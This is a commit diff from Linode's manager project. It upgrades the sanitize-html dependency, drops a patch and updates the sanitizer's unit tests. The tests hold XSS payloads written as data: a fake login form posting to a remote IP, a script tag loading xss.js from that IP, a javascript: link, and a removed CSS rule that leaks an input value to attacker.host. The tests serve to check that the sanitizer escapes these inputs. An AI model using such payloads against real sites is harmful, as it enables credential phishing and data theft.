Bump Sanitize-html to 1.22.1 and remove unneeded patch (#6227)

linode · Mar 25, 2020 · 5d54f4a · 5d54f4a
1 parent 11fb26e
commit 5d54f4a
Show file tree

Hide file tree

Showing 5 changed files with 5 additions and 273 deletions.
diff --git a/packages/manager/package.json b/packages/manager/package.json
@@ -72,7 +72,7 @@
     "redux-thunk": "^2.3.0",
     "reselect": "^4.0.0",
     "rxjs": "^5.5.6",
-    "sanitize-html": "1.20.1",
+    "sanitize-html": "~1.22.1",
     "search-string": "^3.1.0",
     "showdown": "^1.9.1",
     "throttle-debounce": "^2.0.0",
@@ -172,7 +172,7 @@
     "@types/react-test-renderer": "~16.9.1",
     "@types/recompose": "^0.30.0",
     "@types/redux-mock-store": "^1.0.1",
-    "@types/sanitize-html": "1.18.3",
+    "@types/sanitize-html": "1.22.0",
     "@types/showdown": "^1.9.3",
     "@types/throttle-debounce": "^1.0.0",
     "@types/url-parse": "^1.4.1",
@@ -330,8 +330,6 @@
   },
   "workspaces": {
     "nohoist": [
-      "@types/sanitize-html",
-      "sanitize-html",
       "chart.js",
       "chartjs*",
       "wdio-jasmine-framework*",

diff --git a/packages/manager/patches/@types+sanitize-html+1.18.3.patch b/packages/manager/patches/@types+sanitize-html+1.18.3.patch
diff --git a/packages/manager/patches/sanitize-html+1.20.1.patch b/packages/manager/patches/sanitize-html+1.20.1.patch
diff --git a/packages/manager/src/utilities/sanitize-html/sanitize-html.test.ts b/packages/manager/src/utilities/sanitize-html/sanitize-html.test.ts
@@ -12,8 +12,7 @@ const xhrScript = `<script>
 const aClick = '<a onClick="() => console.log("hello world")"></a>';
 const aClickLang =
   '<a lang="en-us" onClick="() => console.log("hello world")"></a>';
-const css = `<style>#username[value="mikeg"] {background:url("https://attacker.host/mikeg");}</style><input id="username" value="mikeg" />`;
-const login = `http://localhost:81/DVWA/vulnerabilities/xss_r/?name=<h3>Please login to proceed</h3> <form action=http://192.168.149.128>Username:<br><input type="username" name="username"></br>Password:<br><input type="password" name="password"></br><br><input type="submit" value="Logon"></br>`;
+const login = `http://localhost:81/DVWA/vulnerabilities/xss_r/?name=<h3>Please login to proceed</h3> <form action=http://192.168.149.128>Username:<br><input type="username" name="username"></br>Password:<br><input type="password" name="password"></br><br><input type="submit" value="Logon"></br></form></h3>`;
 const aScript = `<a href="javascript:alert(8007)">Click me</a>`;
 const queryString = `http://localhost:81/DVWA/vulnerabilities/xss_r/?name=<script src="http://192.168.149.128/xss.js">`;
 
@@ -37,18 +36,10 @@ it('should escape script tags, retain child text, and strip attributes', () => {
 });
 
 it('should escape unwanted blacklisted tags', () => {
-  expect(sanitizeHTML(login)).toBe(
-    '<form>Username:<br />&lt;input /&gt;<br />Password:<br />&lt;input /&gt;<br /><br />&lt;input /&gt;<br /></form>'
-  );
+  expect(sanitizeHTML(login)).not.toMatch(/<form|<input/);
   expect(sanitizeHTML(aScript)).toBe(`<span>Click me</span>`);
 });
 
-it('should not allow CSS attacks by escaping the style tag', () => {
-  expect(sanitizeHTML(css)).toBe(
-    '&lt;style&gt;#username[value="mikeg"] {background:url("https://attacker.host/mikeg");}&lt;/style&gt;&lt;input /&gt;'
-  );
-});
-
 it('should not allow query string attacks', () => {
   expect(sanitizeHTML(queryString)).toBe(
     'http://localhost:81/DVWA/vulnerabilities/xss_r/?name=&lt;script&gt;&lt;/script&gt;'

diff --git a/packages/manager/src/utilities/sanitize-html/sanitizeHTML.ts b/packages/manager/src/utilities/sanitize-html/sanitizeHTML.ts
@@ -26,30 +26,7 @@ export const sanitizeHTML = (text: string) =>
         };
       }
     },
-    /**
-     * this option is not supported and was patched
-     * See: https://github.com/punkave/sanitize-html/pull/169
-     */
-    escapeDisallowedTags: true
-    /** this is basically just converting script tags to text */
-    // transformTags: {
-    //   script: (tagName, attrs: Record<string, string>) => {
-    //     /**
-    //      * get all attributes of the script tag and recreate them as they were typed
-    //      * i.e src="hello.js"
-    //      */
-    //     const attrsAsString = Object.keys(attrs).reduce((accum, eachKey) => {
-    //       return `${accum} ${eachKey}="${attrs[eachKey]}"`;
-    //     }, '');
-
-    //     /** return the script tag as text inside a p tag */
-    //     return {
-    //       tagName: 'script',
-    //       text: `&lt;${tagName}${attrsAsString}&gt;&lt;/${tagName}&gt;`,
-    //       attribs: {}
-    //     };
-    //   }
-    // }
+    disallowedTagsMode: 'escape'
   }).trim();
 
 export const isURLValid = (url: string) =>